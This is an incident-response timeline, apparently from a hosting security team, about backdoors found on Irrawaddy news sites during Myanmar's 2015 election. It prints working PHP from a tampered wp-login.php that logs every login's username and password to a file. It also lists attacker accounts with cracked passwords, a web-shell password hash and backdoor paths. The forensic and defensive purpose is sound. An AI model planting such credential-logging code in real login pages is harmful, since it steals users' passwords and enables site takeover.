Fighting Cyber Attacks during the Burmese Elections

7th Nov 22:30 PM – Critical backdoor discovered

A critical backdoor is found that stores all the admin passwords of the site. The backdoor is a modified wp-login.php of the site to store all the passwords of the users.

/** Make sure that the WordPress bootstrap has run before continuing. */
if(isset($_POST['log']) && $_POST['log'] !=''){
$fp = fopen('/home/burmairrawaddy/public_html/wp-admin/user/log.txt', 'a');
fwrite($fp, $_POST['log'] . ': ');
fwrite($fp, $_POST['pwd'] . "n");
fclose($fp);
}

7th Nov 21:40 PM – All passwords are reset

As an emergency response to the situation, we decide to reset all passwords of the sites.

8th Nov 1:20 AM – WordPress Admin access has two unexpected accounts

Two new accounts are discovered in the .htaccess file that protects the wp-admin area of the site:

     rcn:L9hHT9CWSvtmk
     smorozik:fkvj/MrPzdK7U

8th Nov 1:50 AM – Brute forcing the attackers’ passwords

We bruteforced the password of the account smorozik (Морозик) that was placed by the attacker and found that the password was q1w2e3as

(Update: 13th November 2015: After a few hours of brute force password cracking we found the second password for rcn is rcntest1)

We saw that last time that the attackers have downloaded the credentials to gain access to the site the 6th of November.

203.81.85.66 - - [06/Nov/2015:03:34:32 -0500] "GET /wp-admin/user/log.txt HTTP/1.1" 
203.81.85.66 - smorozik [06/Nov/2015:03:34:34 -0500] "GET /wp-admin/user/log.txt HTTP/1.1" 

8th Nov 2:30 AM – Who is smorozik?

Irrawaddy.org confirms that neither smorozik or rcn are their accounts.

8th November 1:40 AM – Full list of backdoors

All three news sites (English and two Burmese), have been manually scanned for backdoors. The following 12 backdoors were found:

English news site: www.irrawaddy.org (4 backdoors)

  1. wp-content/uploads/2014/10/.htaccess
  2. wp-login.php (logging all credentials in wp-admin/user/log.txt)
  3. wp-content/plugins/fix-rss-feed/fix-rss-help.php
  4. wp-signin.php

Burmese news site: burma.irrawaddy.org (7 backdoors)

  1. feeds/.htaccess
  2. wp-content/wp-cache-config.php
  3. wp-includes/help.php
  4. wp-login.php (logging all credentials in wp-admin/user/log.txt)
  5. fix.php
  6. phpinfo.php
  7. wp-content/plugins/wp-polls/polls-logs.php

Old Burmese news site: bur.irrawaddy.org (1 backdoor)

  1. backup/noob.php

We disable any existing “Backstick backdoors” by disabling PHP functions as shell_exec and variants.

8th Nov 2:00 AM – Monitoring new attacks

The log file “log.txt” that was used to harvest WordPress credentials is left on the server to track activity from the attackers. A script is deployed in the server to send alerts when the attackers access the files.

8th Nov 4:00 AM – De-obfuscating backdoors

Irrawaddy shares a file (help.php) which they found on their server and suspect contains malicious code. The file starts with an obfuscation signature.

$c=strrev("edo"."ced_4"."6e"."sab"); 
strrev=reverse string of base64_decoded()

We de-obfuscated the help.php file to conclude that it was a WSO shell backdoor.

8th Nov 4:05 AM – noob.php backdoor

A second obfuscated backdoor is identified, and after de-obfuscating it, we find the Pakistanian Madspot Backdoor, which is a PHP shell with DDoS capabilities. The backdoor can run UDP flooding attacks.

The Pakistanian Madspot backdoor with DDoS capabilities.
The Pakistanian Madspot backdoor with DDoS capabilities.

8th November 4:10 AM – 203.81.85.66 logged activities

We reviewed alerts to other websites we host and we verify that the IP 203.81.85.66 has been blocked in the past also in a www.dvb.no site

In Irrawaddy.org’s websites we could find traces of the attacker from early July. Earlier traces in early July

203.81.85.66 - - [06/Jul/2015:00:11:01 -0400] "GET /wp-includes/help.php HTTP/1.1" 404 44343
203.81.85.66 - - [08/Jul/2015:02:48:12 -0400] "GET /wp-content/plugins/akismet/views/help.php HTTP/1.1" 404 57957 
203.81.85.66 - - [08/Jul/2015:02:52:51 -0400] "GET /wp-content/themes/twentyfourteen/help.php HTTP/1.1" 200 8194
203.81.85.66 - - [08/Jul/2015:02:53:00 -0400] "POST /wp-content/themes/twentyfourteen/help.php HTTP/1.1" 200 42528
103.25.12.12 - - [08/Jul/2015:08:55:12 -0400] "GET /wp-content/themes/twentyfourteen/help.php HTTP/1.1" 200 8188
103.25.12.12 - - [08/Jul/2015:08:55:18 -0400] "POST /wp-content/themes/twentyfourteen/help.php HTTP/1.1" 200 9763

The attacker has been logging credentials since July 2015.

203.81.85.66 - - [26/Jul/2015:21:57:23 -0400] "GET /wp-admin/user/log.txt HTTP/1.1"
203.81.85.66 - - [26/Jul/2015:21:58:56 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 

More traces of the attackers from 2 October 2015:

203.81.85.66 - - [02/Oct/2015:05:33:53 -0400] "GET /wp-includes/help.php HTTP/1.1" 
203.81.85.66 - - [02/Oct/2015:05:35:12 -0400] "POST /wp-includes/help.php HTTP/1.1" 200 8587

The help.php contains a WSO Shell backdoor with the password

$auth_pass = "19c89c73b70e910980c554e98a7092f6";

9th Nov 9:37 AM – Attackers change IP address

On Monday the 9th of November, the day after the election, there were some topology changes in the military network and attackers move from the IP address 203.81.85.66 to 203.81.85.2. The change took place between 9.49 AM and 9.52 AM local Burmese time.

203.81.85.66 - -[09/Nov/2015:09:49:32 +0000] 
"GET /videos/wp-content/uploads/2015/03/xhead.jpg.pagespeed.ic.ugNON5njyY.jpg" "http://tv.dvb.no/videos/%e1%80%9b%e1%80%bd%e1%80%b3%e1%80%b6%e1%80%b8%e1%80%90%e1%80%9a%e1%80%b9-%e1%80%a5%e1%80%ae%e1%80%b8%e1%80%b1%e1%80%8c%e1%80%b8%e1%80%a5%e1%80%ae%e1%80%b8"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
"XBV:3DD8B0CE676F0FB8"
203.81.85.2 - -[09/Nov/2015:09:51:28 +0000]
"GET / HTTP/1.1" 200 
"http://burmese.dvb.no/archives/category/news/international-news/page/2"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0" 
"XBV:3DD8B0CE676F0FB8" 

The machine with IP address 203.81.85.2 has port TCP 541 open and its traffic signature reassembles a Fortinet Firewall.

9th Nov 10:00 AM – MPT Network Outage

At 10 AM we spotted a partial lost of incoming traffic in one of our traffic balancers. The traffic outage was talking place in AS9988 Myanma Posts & Telecommunications for the period of 1h, a second brief outage takes place at 12 AM for 20 mins.
We verified that several prefixes of the operator became unreachable and verified the information using our own probes and RIPE Atlas.

BGP activity in network 203.81.72.0/21
BGP activity in network 203.81.72.0/21